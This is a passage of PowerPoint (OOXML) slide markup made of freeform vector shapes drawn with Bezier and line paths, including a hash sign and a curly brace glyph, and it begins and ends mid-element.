                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>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3"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="156"/>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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171"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60" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>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5" y="72"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>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3"/>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70"/>
                      <a:pt x="69" y="172"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71"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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136"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3" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>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5" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75"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1"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="64"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="188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Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="1883"/>
                <a:ext cx="5" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 2"/>
                  <a:gd name="T6" fmla="*/ 2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0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4"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Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="37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Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>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Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="379"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 66 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 151 h 218"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 151 h 218"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 151 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 151 h 218"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 151 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 151 h 218"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 66 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 66 h 218"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 66 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 66 h 218"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 66 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 66 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110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6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="66"/>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Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="374"/>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Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="372"/>
                <a:ext cx="82"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Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="379"/>
                <a:ext cx="78" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 82 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 240"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 119 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 194 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="240"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="22" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="14"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="220"/>
